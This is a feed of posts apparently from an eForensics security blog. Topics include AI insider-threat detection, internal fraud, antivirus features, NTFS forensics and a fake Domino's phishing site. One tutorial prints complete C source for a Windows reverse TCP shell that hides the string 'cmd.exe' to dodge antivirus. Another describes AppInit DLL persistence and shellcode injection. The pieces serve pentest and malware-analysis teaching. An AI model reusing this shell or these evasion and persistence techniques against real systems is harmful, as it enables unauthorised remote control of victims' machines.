Compared to the leaderboard points the public facing solution was only 5% "worse." Is a 5% difference a huge amount in the world of data science? Yes (though it depends also how you measure confidence levels). So out of 2400+ teams, the best model achieved a success accuracy of ~68%. But from a budgeting ROI stand point when a CISO asks for their next FY's CAPEX-- 68% isn't going to cut it for most security programs.

While somewhat discouraging, it's important to remember that there are dedicated data science and dev ops professionals that spend their entire careers doing this to get models u to the 95% or better range. To achieve this, tons of model testing, additional data, and additional featureset extraction is required (as we saw in RapidMiner Studio doing this automatically for us).

Where do we go from here for applying AI to insider threats?

Obviously, this is a complex task. Researchers at the Deakin University in published a paper called "Image-Based Feature Representation for Insider Threat Classification" which was mentioned briefly in the earlier portion of the article. They discuss the measures that they have had to create a feature set based on an extended amount of data provided by the same US-CERT CMU dataset and they created 'images' out of it that can be used for prediction classification where they achieved 98% accuracy.

Within the paper the researchers also discussed examination of prior models such as 'BAIT' for insider threat which at best a 70% accuracy also using imbalanced data. Security programs with enough budget can have in-house models made from scratch with the help of data scientists and dev ops engineers that can use this research paper into applicable code.

How can cyber defenders get better at AI and begin to develop skills in house?

Focus less on the solution and more on the data science and pre-processing. I took the EdX Data8x Courseware (3 in total) and the book referenced (also free) provides great details and methods anyone can use to properly examine data and know what they're looking at during the process. This course set and among others can really augment and enhance existing cyber security skills to prepare us to do things like:

Evaluate vendors providing 'AI' enabled services and solutions on their actual effectiveness such as asking questions into what data pre-processing, feature sets, model architecture and optimization functions are used
Build use cases and augment their SOC or threat hunt programs with more informed choices of AI specific modeling on what is considered anomalous
Be able to pipeline and automate high quality data into proven tried-and-true models for highly effective alerting and response

Closing

I hope you've enjoyed this article and tutorial brief on cyber security applications of insider threats or really any data set into a neural network using two different solutions. If you're interested in professional services or an MSSP to bolster your organization's cyber security please feel free to contact us at www.scissecurity.com

Original post: https://www.linkedin.com/pulse/getting-hands-n-ai-cyber-security-professionals-dennis-chow-mba/?trackingId=

Please note: All future articles will be on Medium. Please follow https://medium.com/@dw.chow for updates.

The post Insider Threat Detection with AI Using Tensorflow and RapidMiner Studio | By Dennis Chow appeared first on eForensics.

↧

Analyze Binaries in Ghidra to Write Shell Payload in C for Windows Systems | By Dennis Chow

June 18, 2020, 1:13 am

≫ Next: How Businesses Can Avoid Internal Fraud

≪ Previous: Insider Threat Detection with AI Using Tensorflow and RapidMiner Studio | By Dennis Chow

Analyze Binaries in Ghidra to Write Shell Payload in C for Windows Systems

In this article, we’ll go over some example C code that is Windows x86 compatible and analyze binaries using Ghidra to help you write or improve upon your shell code skills by creating the payload first. The practical applications of malware analysis and reverse engineering efforts can help penetration testers improve their evasion techniques and achieve command execution on systems without Linux (or ported) tools against Windows systems. We’ll examine samples using native windows libraries, compilers, C based shell payload, and Metasploit (MSFvenom) payload for Windows. Are you ready? Let’s dive right in!

Disclaimer: The methods, code examples, and techniques mentioned throughout this article for educational purposes only.. The author takes no responsibility for any unauthorized activities performed using the information in this article. All code or compiled binaries are provided ‘as is’ with no expressed warranty.

Feel free to download and install these tools and follow along in the article to practice your win32-ninja shell code skills with us.

Tools in Use:

Payload binaries and source examined: systemcall_shellcode.c and reverse_winsocktcp_shellcode.c
Visual Studio 2019 Community with the C++ Desktop Extensions and Packages
Ghidra from the NSA (ensure you install Oracle’s JDK x64 kit before you run the batch file)
Optional: Metasploit Framework *Note: If you need to install this, there is an issue with the MSI installer. Right click and ‘run as’ Administrator from the cmd terminal and then specify the installer msi to run so it does not fail.

Writing your first Win32 Compatible Shell Payload in C

Many cyber security professionals (including myself) aren’t experts in shell code creation nor the ancient C language. So when we do pen testing engagements; are go-to tool for shell payloads almost always includes Metasploit and specifically running either MSFVenom, Veil, and or some other C2 frameworks (in a post Empire world) that generates the desired shell code for you. But these solutions, like any pre-made template aren’t always perfect and many vanilla payloads produced are caught by endpoint security solutions.

So why not write our own? Many tutorials you see focus on compiling or writing payloads for Linux. If we’re compromising and pivoting between Windows systems, we need to step it up. So let’s get our first C-code template ready to go down below:

	#include <stdlib.h>	//to use system()
	int main()
	{
		char command[100] = "calc.exe";
		system(command); //executes the calc.exe native path file
	

		return 0;
	}

In the above you see one of the simplest 'cmd only' forms of shell payload. It's not a full shell, but it's a starter template that uses native standard libraries so you can execute an external system call that will honor the Windows System32 directory path. It's quite obvious what happens in the above snippet.

Note: This payload is detected as 'malware' from Chrome and Google Drive services. Windows defender at the time of this writing on Windows 10 does not flag the compiled binary.

You might be wondering "who cares" in the above template. It serves as a base for us to compile this to a binary and examine a very simple way to begin reverse engineering a standard portable executable and get you comfortable with navigating Ghidra for finding functions, and tracing references and variables to the decompiler window as we see coming up.

Compile Your C Shell Payload in Windows

In our example template; we'll use Visual Studio (VS) since it's got nice colors and a GUI to make it easy to showcase. You can also use the common 'MSBuild' method by including the C file in an XML template that can be compiled that is native on most workstations. But let's use VS because I have screenshots.

Create a new project for a Win32 Console application. Ensure you've got the C++ extension installed. After the default solution files are generated, right click on the solution explorer and add a new source file. Instead of adding a C++ file with the extension (.cpp) call it (.c). The VS compiler will use the appropriate language compiler based on your extension.

Now paste your C source code, and you'll notice that if you try to build the solution; you may receive an error regarding the main function already been represented in another file. You'll have to remove (disable) the original default C/++ file from the project solution so the compiler knows you won't use it as shown below:

Now that we've prepped the environment you can compile and build the solution. If you hit 'Crtl+F5' it'll execute the binary as well and you'll see calc.exe pop up. If you're like me; you may have started 'modifying' the shell code by adding different enhancements to try to make it more useful. Note that the use of insecure classic functions that include potential buffer overflow conditions will show up as errors or warnings and prevent the build. You'll need to instruct the compiling pre-processor to ignore these like so in the below image:

To do so, right click on your C file in solution explorer and set the configuration properties under 'preprocessor'. Edit the macros and add in (case sensitive) the warning bypass macros to the definitions field. Copy and paste the snippet below if you are running into this issue:

_CRT_SECURE_NO_WARNINGS
_CRT_SECURE_NO_DEPRECATE
_CRT_NONSTDC_NO_DEPRECATE
_WINSOCK_DEPRECATED_NO_WARNINGS

Congratulations, you've compiled your first Win32 C-source shell code. Let's analyze the binary in Ghidra so you can get a feel for what the code decompile looks like when you DON'T have the source code. For example, if you managed to isolate a sweet piece of malware that did not get detected and you want to mimic its TTP's.

Using Ghidra to Search and Decompile

In this section, we're going to import the binary into Ghidra and start exploring the varying structure of the our original C shell code so we can identify the main() function, when variables are loaded, and the system() execution and compare it to our source code.

When you first load the binary into Ghidra, you'll want to use the default 'automatic analysis' settings (select YES) before you get to the main screen. From the main view, find the left panel under functions/symbols and discover the 'entry' point as often you won't see the main() function properly parsed.

Hit up the 'entry' icon in the symbol tree (functions) menu towards your bottom left pane and click on it. Your main code viewer window will jump to the entry point of when the program begins to execute your main function.

Also note to the right in the decompiler pane, is a familiar looking main() structure that's been labeled a function and your computer's memory address followed by the return. We'll rename this to main() by right clicking on the function label. This denotes our main structure of our code.

You can further explorer other functions from DLL imports potentially called and non-obfuscated strings by examining the symbols tree (if the binary wasn't already stripped). Since we already know from our source code, let's look for 'calc.exe' since we know that's what we executed in the payload. *Yes, I know: You don't have that luxury examining other pieces of malware or binary shell payloads; we'll examine how to trace and map functions more effectively in our upcoming examples. Hold Tight!*

Double clicking on the location address in the string search window calc will jump us to the data segment (DS) section. To our highlighted right (in yellow); we also see local variables in the de-compiler being listed and pushed onto the stack. If you look carefully, it is indeed for Win32 x86 Intel architecture as the bytes are stored in little endian. It's also 4 bytes across as a proper word value (though we reference this as DWORD in Windows) of 32 bits as validated by converting the hex below:

The careful analyst will also observe the varying system call related functions surrounding our string pushed onto the stack. Lets take a closer look:

What you see above is the subroutines in the main function. We see the data 'calc.exe' being pushed onto the stack frame and set in memory by 'memset()' followed by our famous 'system()' call. Since this is an imperfect de-compile of the C code, we reference the library methods to see how the actual structure of the source might look like (if we didn't already have the source code):

// C program to demonstrate working of memset() 
#include <stdio.h> 
#include <string.h> 
  
int main() 
{ 
    char str[50] = "GeeksForGeeks is for programming geeks."; 
    printf("\nBefore memset(): %s\n", str); 
  
    // Fill 8 characters starting from str[13] with '.' 
    memset(str + 13, '.', 8*sizeof(char)); 
  
    printf("After memset():  %s", str); 
    return 0; 
}

In the above eample from GeeksforGeeks.org site we see that memset was explicitly called but in our code, it was simply implied after setting up the construct and variable: "char command[100] = "calc.exe";" like so. In the documentation it says memset is indeed filling our buffer into memory. Now let's get to the actual 'evil' execution of our intended payload via system().

// A C++ program that pauses screen at the end in Windows OS 
#include <iostream> 
using namespace std; 
int main () 
{ 
    cout << "Hello World!" << endl; 
    system("pause"); 
    return 0; 
}

In the above the external reference also shows how system() syntax is used and it simply takes in a string argument and we see our standard return statement from the routine.

Examining a more complex sample (reverse_tcp_shell)

In this next example, we will examine slightly modified version of a reverse tcp shell payload written in C and designed to compile and run natively for Win32. Unlike vanilla msfvenom and other non-tuned payloads; the endpoint (antivirus) may detect such shell code. The original shell.c is found here where there's a few typos that needed adjusting. The author is "Yahav N. Hoffmann" written in 2016 but still wasn't alerted (compiled) by my Windows Defender in May of 2020 in Windows 10! Amazing what custom shell coding can do. Some of his methods are similarly demonstrated in another piece of shell code authored by 'paranoidninja' and that is located here (if you wish to read more on the evasion techniques).

And yes, the code works as shown in my PCAP runtime below:

For now, use the one I have hosted in my Github for the purposes of my demonstration and syntax corrected compiling ease. Here's our code template to reference from:

//Another great template can be found here
//https://0xdarkvortex.dev/index.php/2018/09/04/malware-on-steroids-part-1-simple-cmd-reverse-shell/


//Original location
//https://github.com/infoskirmish/Window-Tools/blob/master/Simple%20Reverse%20Shell/shell.c
/* Windows Reverse Shell
Test under windows 7 with AVG Free Edition.
Author: Ma~Far$ (a.k.a. Yahav N. Hoffmann)
Writen 2016 - Modified 2016
This program is open source you can copy and modify, but please keep author credit!
Made a bit more stealthy by infoskirmish.com - 2017
*/

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32") //dc401 corrected typo of w2 to ws2

WSADATA wsaData;
SOCKET Winsock;
SOCKET Sock;
struct sockaddr_in hax;
char aip_addr[16];
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;


int main(int argc, char* argv[])
{
	WSAStartup(MAKEWORD(2, 2), &wsaData);
	Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);

	if (argv[1] == NULL) {
		exit(1);
	}

	struct hostent* host;
	host = gethostbyname(argv[1]);
	strcpy(aip_addr, inet_ntoa(*((struct in_addr*)host->h_addr)));

	hax.sin_family = AF_INET;
	hax.sin_port = htons(atoi(argv[2]));
	hax.sin_addr.s_addr = inet_addr(aip_addr);

	WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);
	if (WSAGetLastError() == 0) {

		memset(&ini_processo, 0, sizeof(ini_processo));

		ini_processo.cb = sizeof(ini_processo);
		ini_processo.dwFlags = STARTF_USESTDHANDLES;
		ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;

		char* myArray[4] = { "cm", "d.e", "x", "e" };
		char command[8] = "";
		snprintf(command, sizeof(command), "%s%s%s%s", myArray[0], myArray[1], myArray[2], myArray[3]);

		CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);
		exit(0);
	}
	else {
		exit(0);
	}
}

That looks exciting, we have attempted 'cmd.exe' evasion by splitting it into an array of format strings and then concatenating them later; we also have if/else branching conditions and CLI level arguments we can process. Now that we've examined the code. What does it look like under a decompiler assuming we don't have it?

Open up Ghidra again and let's hit up the entry point, identify the main() function and begin tracing are functions down the rabbit hole. *Don't worry, we won't be 'cheating' and specific string searches. We will examine the symbols and strings for any interesting keywords though.

Wow, that's alot of unique strings and good information about the variables and function uses in the data segment (DS) of our binary. Do you recognize the famous "%s%s%s%s" in sets of (4 bytes or 32 bits)? I hope you do! But let's get more realistic and start thinking how we can examine the decompiled pseudo code in Ghidra. Let's open up the function map window similar to how you would do it with 'space bar' in IDA Pro or x64dbg Graph View.

If you do a side-by-side comparison you can see the conditional statements, and potential loops from our source code and the graph view. This will help you determine where there might be subroutines used and also focus on true/false conditions that you'll want to investigate for creating a fork or a patch to some C code. Another tool that we can use is commonly called 'references' which is commonly called (xref with the 'x' hot key in IDA).

This lets you map functions or variables that have been called or mentioned in other functions or portions of the code. As you can imagine, jumping in and out of varying functions can get very complex fast! So for pure shell code payload that is compiled, it's best to start top down from the OEP and main() function and dig into what would likely be used such as system calls and socket creations. The great thing about Ghidra is that it visualizes this for you if you 'right click' and scroll to the references sub-menu and select the open call tree option.

In the above, I've highlighted the function call tree windows for incoming and outgoing calls. relative to our main() function that we renamed earlier. You'll also notice lots of 'XREF' or referenced mentions to the same function (main) memory address space and their appropriate IO in memory (Read/Write in colors). What's also very interesting are all the identified native windows C functions and their outgoing calls. Given that we have a reverse shell, I might be inclined to start investigating the WSASocketW calls first.

But, before we do that, remember when we discussed format strings? Let's revisit that code comparison and how it also looks in the C decompiler once more with rigor:

In the above, we side by side compare our original source to the decompiler window and we see clues that Ghidra couldn't parse the snprintf() function as easily. Even still, this gives you clues to which functions might be used based on the data arguments. Before leaving the screen, take note of the CreateProcess function which is not C specific, but actually Windows specific and note how it wasn't decoded. Other solutions such as IDA Pro might already have this decoded for you; but learning to write shell code from scratch in C; this is great practice for your API research skills.

In our last portion of this example; we examine another portion of our shell code construct. It takes (2) arguments, an IP and port according to our source code. Notice in the decompiler Ghidra gets very close to showing you the useful syntax and the number of arguments. We also know that this is part of the main function as we see it is very close and loaded position right after the entry point of the application.

What about the metasploit payloads from msfvenom?

We don't have any screenshots of our examination of the basic windows (non staged) bind shell and reverse TCP shells. However, when we examined it under Ghidra; you really get a sense of just how much work the teams at Rapid7 and the security community for the Metasploit framework have put in to making them difficult to detect and robust in their error and condition handling.

We weren't able to easily jump between sections and show case easy C structure and functions to reference (which is honestly, kind of good for AV detection anyways) after exporting (using -f exe from msfvenom). What this means is that you as a seasoned pen tester need to practice DFIR and REM skills. I've personally enjoyed my GREM certification and it complements the GXPN very well in exercising skills to be able to develop shellcode on your own.

Closing

I hope you've enjoyed a little preview into how power Ghidra is and how you can exercise malware analysis and reverse engineering skills to complement and take your shell code writing skills to the next level for windows systems. There's so much more reading that is available for those wanting to extend their knowledge beyond this article. I encourage you to visit the links below in your spare time. As always, if you enjoyed what you saw here.

Feel free to follow, clap, like or send me general feedback. If your organization is in need of an MSSP or other security subject matter expertise; find us online at www.scissecurity.com

Additional Resources and Examples

There’s more reading if you wish to learn more and have more templates to choose your initial reversing from. You aren’t just limited to analyzing C based payloads; there’s many other payloads and solutions that can you can gather more ideas from.

Using Slack as a C2 Channel

Analyzing meterpreter payload with Ghidra

MultiOS Reverse Shell made in .NET (you can always use dotpeek to decompile the code if you only have a binary because .NET is middlware language)

MSbuild XML Template for Shellcode (C source ready)

Compile C code entirely from Windows CLI

Original link: https://www.linkedin.com/pulse/analyze-binaries-ghidra-write-shell-code-c-dennis-chow-mba/?trackingId=ByQoAw2HSqeq3%2FZAPduuAg%3D%3D

Please note: All future articles will be on Medium. Please follow https://medium.com/@dw.chow for updates.

The post Analyze Binaries in Ghidra to Write Shell Payload in C for Windows Systems | By Dennis Chow appeared first on eForensics.

↧

How Businesses Can Avoid Internal Fraud

June 22, 2020, 9:45 am

≫ Next: Essential Features of Reliable Antivirus Software

≪ Previous: Analyze Binaries in Ghidra to Write Shell Payload in C for Windows Systems | By Dennis Chow

An employer never expects an employee he or she hires to one day bring down the company, but it happens all the time when an employee decides to commit fraud. Internal fraud is a huge issue that requires employers to react.

If you want to stop fraud in your business, then you need to act now. It starts by understanding how fraud can impact your company, and then it requires taking the proper steps to make sure no employee will ever have the chance to do anything fraudulent.

The Dangers of Fraud

If you have a small or medium-sized business, then you are most at risk for internal fraud. Companies of this size often have a sense of family where employees can easily get away with more nefarious activities because nobody expects it to happen.

While it is perfectly fine to be close with employees and encourage comradery, you still need to maintain professionalism. You need to understand that you can't always trust everyone, even if they seem to be a wonderful person. It is often those employees who everyone loves and thinks is the nicest person ever who are the ones that are stealing from you.

There are three general types of internal fraud:

Theft
Misappropriation of assets
Financial statement fraud

These activities could include stealing cash or property, making fake claims, getting kickbacks, or creating schemes to skim money from accounts. Fraud may also include larceny, fraudulent disbursements, embezzlement, and stealing customer lists or trade secrets.

Signs of a Bad Apple

SCORE suggests familiarizing yourself with the common signs that someone may be a risk to your business. Things to watch out for include:

Suddenly working late or overtime
Substance abuse
Financial troubles
Issues with changes to policies
Living above means
Gambling addictions
Side jobs similar to your business

Seeing multiple signals or noticing these behaviors as something new with an employee could point to something going on. Of course, you do want to do some investigation before assuming the person is involved with criminal actions. For example, if you start to notice someone working more overtime, then you want to see if there is a logical reason behind it. In many cases, there will be. So, avoid jumping to conclusions, but keep your eyes open so you don't miss obvious signs that you have a problem.

6 Steps To Take To Stop Fraud

While it may be tough to prevent all fraud from occurring, there are things you can do to minimize the possibility. Taking a proactive stance will allow you to stay on top of things, and should an employee decide to engage in criminal activities, you will have the ability to catch him or her before your business suffers too much of a loss.

1. Set Checks and Balances

You need to institute a system within your business where work runs through multiple employees. Leaving one employee to manage everything is a huge risk. You need checks and balances to spot issues. When one employee checks the work of another, you can more easily identify oddities and manage accounts better.

2. Make the Rules Clear

Being upfront with employees and letting them know you will not tolerate internal fraud can set the right environment in which nobody will even try to do something nefarious. Make the rules clear by providing employees with written policies for ethics and fraud. Also, make sure you outline what will happen if you discover any type of fraudulent activity.

Do not forget to set a good example and show from the top down how you follow the rules. If you relax the rules for even one person, it opens the door for others to follow suit. Then, all the rules become a moot point because employees see you don't take them seriously.

3. Make Employees Take Time Off

Enforce vacation and time-off policies. Letting employees overwork opens the door to opportunities to conceal wrongdoing. Also, when you give employees time off and make them take it, it can make it much easier to spot a problem.

4. Reduce Risks

You have many ways to reduce the risk of fraud in your business starting with surprise audits. Corporate investigations allow you to get a real look at what your employees do and make it simple to spot issues.

You should also limit access to credit cards and accounts so you can more easily monitor them. Control receipts for your business, and always check them for validity. Also, track your checks and watch for missing numbers. Keep good control over inventory as well.

5. Implement Training

Train your employees on fraud prevention and detection. When everyone knows what to watch for, it makes it easier to control the situation. Most people will not even try to do something if they know that the chances of getting caught are high. When you train your staff, it creates a group mentality that fraud is not acceptable, so they will be highly likely to let you know if something is amiss.

6. Follow Through

You have to be strong and firm when it comes to fraud, which means that if anyone comes to you with concerns, you investigate them fully. Always follow up because if you let reports go, that just tells your employees that you aren't serious about stopping the activities. It essentially gives those who are doing wrong the green light to keep doing it.

Also, you need to make it easy for people to make reports. Make sure that the system you use allows them to do so without everyone else knowing they did it. People often will not want the spotlight on them as the person who revealed what was going on, and if they don't feel they can make a report privately, they simply won't do it.

Keep Your Business Safe

It is fully in your hands to protect your company from internal fraud. All it takes it committing to it and making sure that you send the right messages to your employees. Create a work environment of zero tolerance, and you can stop fraud in its tracks.

Jeremy Biberdorf
modestmoney.com

Connect with me on social media: Twitter | Facebook | LinkedIn

The post How Businesses Can Avoid Internal Fraud appeared first on eForensics.

↧

Essential Features of Reliable Antivirus Software

June 11, 2020, 2:29 am

≫ Next: ITSM Solutions Security Trends to Watch out for

≪ Previous: How Businesses Can Avoid Internal Fraud

| sponsored post |

Essential Features of Reliable Antivirus Software

Antivirus software is just as important today as it’s ever been. With so many providers to choose from, discover the key features to look out for here.

What to Look For in the Best Antivirus Software

Though technology is always developing, we haven’t yet gotten to the point where our devices and web browsing can no longer be targets of hacking and malware. The truth is, we likely never will. That’s why, now more than ever, it’s essential to have high-quality antivirus software running at all times on phones, laptops, and computers.

As the devices we use grow slicker and smarter, so do the techniques and tools of the modern-day hacker. Without antivirus, and the various other programs we need to ensure online safety, your laptop could be loaded with keyloggers, malware, or something equally nefarious, and discovering and removing these threats is a lot tougher.

Unfortunately, much like with hosting and VPNs, the market is saturated with subpar providers and those that don’t deliver on their promises. That being said, there are telltale signs that you can look out for when picking your first antivirus or migrating from an existing subscription. Keep reading to find out what they are.

Key Features to Look Out For

Price: It’s really not that difficult to find an antivirus tool that’s effective but also works for your budget. Chances are, several of the providers you compare will be running some kind of promotion or deal. If they’re not, you just need to shop around until you find a price that works.

While some are rather restrictive in their options, certain providers let you pay monthly or with terms ranging from 1-3 years. To make it even cheaper, you can tailor your plan to protection for just one device. If you’d rather not pay at all, there are some decent free antiviruses out there, from brands like Kaspersky and Bitdefender, but they come with less protection than the paid alternatives.

Download Protection: Sometimes, there’s no easy way of knowing what’s sneaking its way into our downloads. Depending on what you’re downloading and from where, there’s a good chance that some kind of adware or malware has been included. Oftentimes, though the software is legitimate, the site hosting it might look to include files that don’t belong, that can be used to monitor your activity and steal logins and card details.

If you accidentally download something you shouldn’t, the antivirus will quickly point this out and prevent the file from installing on your computer.

Real-Time Monitoring: The best security software will always include real-time protection. This is key to keeping you safe on the web whether you’re on the move or at home. Essentially, this means that your antivirus software will detect any malicious programs and websites in real-time, so you’ll always be protected.

This feature runs perfectly in the background so you won’t need to set anything up. Plus, it won’t use much processing power at all. You can just continue using the internet the way you usually would and expect notifications on your desktop should anything go wrong.

Malware Scanning/Threat Removal: Knowing whether or not you already have threats on your device is half the problem of not owning an antivirus. If you’re experiencing performance interruptions, unusual behavior, or an inexplicable amount of RAM being used, it’s likely that you already have some kind of ransomware or bloatware.

Having an antivirus installed means that you can easily identify problem files as they invade your devices, making damage control much more likely.

Antiviruses take the stress out of removing bad files too, not just scanning for them. Once nefarious files and their locations are found, you can remove and quarantine them effortlessly.

Email Scanning: Our email inboxes are one of the biggest targets for phishing scams, monetary theft, and malware. According to a recent study, of all the data breaches in 2019, 32% of them were through phishing alone. Emails are constructed to look just like they would from your bank and the social media sites you use, making it all too easy to fall victim to these kinds of scams.

Whether it’s to get your login details or to make you install malicious files, these kinds of emails can easily be spotted with an antivirus. Your software will scan all emails based on the sender, the files attached, and more, ensuring you don’t get exposed.

Summary

Antivirus software is just one of the sophisticated tools available to combat online threats. Though it’s always better to use alongside other useful programs, just installing an antivirus alone provides a much greater defense than having nothing at all. When deciding which provider to go with, remember to keep an eye out for these important features.

The post Essential Features of Reliable Antivirus Software appeared first on eForensics.

↧

ITSM Solutions Security Trends to Watch out for

June 15, 2020, 2:17 am

≫ Next: File System Tunneling [FREE COURSE CONTENT]

≪ Previous: Essential Features of Reliable Antivirus Software

| sponsored post |

ITSM Solutions Security Trends to Watch out for

How is ITSM going to change over the next year or so? People have pointed out that a lot of the changes are not going to come to fruition quickly. Developments, including AI are not going to take the field by storm as it has been prophesied, but it will find its place in the landscape overall. This is one of the many reasons why a lot of the trends from 2019 are going to carry through into 2020. To find out more - read on.

AI Solutions are Going to Focus on Augmented Intelligence

For a lot of organisations, solutions that are based on AI are going to be an interesting consideration for quite some time. AI has a tremendous amount of power when you look at the long-term use, but at the end of the day, not everybody is ready for what it has to offer. AI tech is certainly mature enough for any organisation to see the benefits. One AI tech use case includes chatbots. Even so, there hasn’t been a huge adoption rate. Why? A lot of it comes down to the fact that chatbots are most often adopted by bigger organisations. The main reason for this is because these organisations have enough big data and calls to train their chatbots so that they can recognise the trends and even the anticipated needs of their end-users. The more repetitive the calls you get are, the easier and faster it is for you to implement a chatbot. Take SysAid for example, they have made leaps and bounds in the industry, and this is a testament to how much this type of tech is being used, even though the adoption rate is slower than most expected.

Smart Automation Solutions are Playing Catchup

If AI isn’t offering the tech that you are looking for, but you would like to increase your service desk efficiency, then what do you do? Automation is a good place for you to start. Automation has always been a relevant topic; it has bonded quite a lot with AI. In 2019, both AI and automation were frequently mentioned together in presentations and even blog articles. They also mentioned one another at industry events too. Organisations are always trying to see the relevance and the instant benefits too. One form of smart automation that is gaining popularity is robotic process automation. This involves programming a specific software so that it can carry out repetitive tasks. This could involve handling orders or even expense requests that have been received in an intranet form.

RPA can allow your staff to spend way more time doing what they are actually good at and it also gives you the chance to provide a very good level of customer service too. It is expected that even more service desks are going to be used to explore and implement automation solutions in the next year or two which is really interesting.

The post ITSM Solutions Security Trends to Watch out for appeared first on eForensics.

↧

File System Tunneling [FREE COURSE CONTENT]

June 24, 2020, 5:53 am

≫ Next: AppInit DLL injection | By Siddharth Sharma

≪ Previous: ITSM Solutions Security Trends to Watch out for

In this video from our NTFS Forensics course our instructor, Divya Lakshmanan, will explain what is file system tunneling. This concept is an important thing to understand when doing forensics on Windows machines, and it can save you some headaches, for sure. Enjoy the video!

Every degree course on Digital Forensics begins with a study on File System Forensics - which has a guaranteed module on the New Technology File System used by Windows Operating Systems. At present, the competitive job market looks for professionals who can ‘Do one thing well’. Regardless of the amount of theoretical knowledge, practical knowledge and hands-on training sets you apart from your peers. If you wish to learn the internals of the NT file system and how to perform forensic procedures on it, then this is your go-to course.

What will you learn?

Internals of the New Technology File System
How the various data structures are organized within the NT File System
How to interpret the data structures, thereby perceiving how file storage is done by NTFS
How to perform File System Forensics on NTFS

What skills will you gain?

File carving on NTFS, for data recovery or forensics.
Ability to decipher hexadecimal data efficaciously
Competence to write custom scripts that can be added as plugins to formal forensic tools
Endurance to operate with hexadecimal data!

Topics covered:

Introduction to NT File System, How to forensically approach NT File System?, $Boot File, $MFT File, $Volume File, $AttrDef File, $Bitmap File, Introduction to NT File System, How to forensically approach NT File System, $Boot File, $. (root) File, Resident File, Non-resident File, Directory, Behaviour on file/directory deletion, Behaviour of NT File System on Linux, File System Journaling, File System Tunneling, Object Identifiers, Links – Soft links, hard links, junctions, Sparse Files, Compressed Files, Encryption, Access Control Lists, Alternate Data Streams, The Sleuth Kit Tool Suite against NTFS, How to ‘approach’ forensics of NTFS forensic image?

The post File System Tunneling [FREE COURSE CONTENT] appeared first on eForensics.

↧

AppInit DLL injection | By Siddharth Sharma

June 26, 2020, 4:12 am

≫ Next: New spam / phishing campaign on Whatsapp – investigating fake Dominos pizza websites | By Maciej Makowski

≪ Previous: File System Tunneling [FREE COURSE CONTENT]

AppInit DLL injection

Recently some earlier versions of Ramsay malware (malware capable of operating within air-gapped networks) used AppInit Dlls for persistence during the attack phase. AppInit is actually a registry key that is, when its specified with attackers dll, any application in the system that uses User32.dll would load the attackers dll as well. AppInit dll injection technique is being used by adversaries since long and its mainly used for gaining persistence during the attack phase.

In this short blog we will take a simple example to show how through this technique, on opening command prompt, calc gets popped. First we start off with specifying the target dll in the appinit registry key,

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs = ‘path_to_your_dll‘

And then we enable this technique,

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs = 1,

Attacker could simply use a batch script to enable this on the victim PC. Once keys are specified and set, any application that uses User32.dll would also load attackers dll (in this case, our dll is appinit.dll in D: drive as highlighted above).DLL injected by attacker might contain shellcode or other malicious activities.

Practical Example:

Below code images are of our sample DLL which contains the shellcode::

Starting with DllMain function:

For this example, I have kept our target as cmd.exe but attackers could simply use other processes as well running in the system in which User32.dll gets loaded while running, after that we have a chkprocess function which just compares the opened process with ‘cmd’ string and if it matches, it injects the shellcode into the cmd.exe process.

This code snippet above shows the injected() function in which first we create a process in suspended mode with regsvr32.exe(for whitelisting) as command line , then we just capture the context of the thread of the process using GetThreadContext() in order to set the Eip/Rip register, then we just allocate the space for our shellcode using VirtualAllocEx(as its remote process). Afterthat, we use WriteProcessMemory api for writing our shellcode to the allocated space and then, at last we resume our thread after pointing Eip to entry point of shellcode, to continue execution.

NOTE: For parameters kindly refer microsoft MSDN.

Shellcode that gets injected and pops calc.exe:

DEMO:

As we can see above when i fired cmd, calc gets popped and on looking the properties of cmd, i found that our module(appinit.dll) also got loaded.

Endgame has already covered an analysis of such type of infection where they have shown how we could detect this kind of injection.

References:

https://attack.mitre.org/techniques/T1103/

Microsoft MSDN

About Siddharth:

Interested in cybersecurity, his blog: https://threatblogs.wordpress.com/
Student currently pursuing bachelors of technology (Computer Science)
Interested in malware analysis,reversing and forensics.
Did internship at Computer Emergency Response Team, India (CERT-In)

The post AppInit DLL injection | By Siddharth Sharma appeared first on eForensics.

↧

New spam / phishing campaign on Whatsapp – investigating fake Dominos pizza websites | By Maciej Makowski

June 26, 2020, 4:31 am

≫ Next: Cybersecurity Career Guide: How to Land the Best Jobs | from University of Nevada

≪ Previous: AppInit DLL injection | By Siddharth Sharma

New spam / phishing campaign on Whatsapp – investigating fake Dominos pizza websites

This week’s focus is an impromptu investigation sparked by another reader submission.

This is the message that one of the readers received today on Whatsapp:

The domain looks deceivingly in order – after all, the real Dominos website in Ireland is www.dominos.ie….

Looks legit, right?

Well, not exactly. To understand what we’re looking at here, a quick explanation on web domain addressing structure is in order.

Every valid Internet domain name is comprised of the following components:

Top level domain – whatever follows after the last dot in the URL string. Common top level domains examples are: .com, .org, .gov, .net, .uk, .ie… And in this case, it’s .club.
Second level domain – whatever is before the top level domain. So, the second level domain of this blog is osintme and the top level domain is .com. In our example, the second level domain is ie-pizza (yes, a hyphen is the only special character is allowed by the domain naming convention).
Subdomain – whatever is positioned before the second level domain. It can be anything really, for example: aws.amazon.com – the aws part is the subdomain here. And in our case, the subdomain is dominos.

Visually it can be very confusing and I would not blame people for believing this could be a real Dominos Pizza website – because at the first glance, it does look real.

A quick check using who.is reveals that the domain was registered only yesterday (21st May 2020).

It was registered using namecheap, a US based hosting company whose services are known to be frequently abused by scammers and cyber criminals.

So before I proceeded any further, I fired off an email to namecheap, just to let them know somebody is hosting a scam website using their service.

abuse@namecheaphosting.com

Visual examination of the domain in a safe virtual machine environment only confirms this is a scam:

I was expecting malicious content so I scanned the website using two very solid malware analysis platforms. The results for both scans are available below:

Any.Run:

https://app.any.run/tasks/b5fdaee3-39e5-4be1-9d68-6a3bd55e2611/

… and Virus Total:

https://www.virustotal.com/gui/url/440b4a6a5ec27fe188ac2a4f810f4a72759b0bf31ac9bd014693718a06e283b1/detection
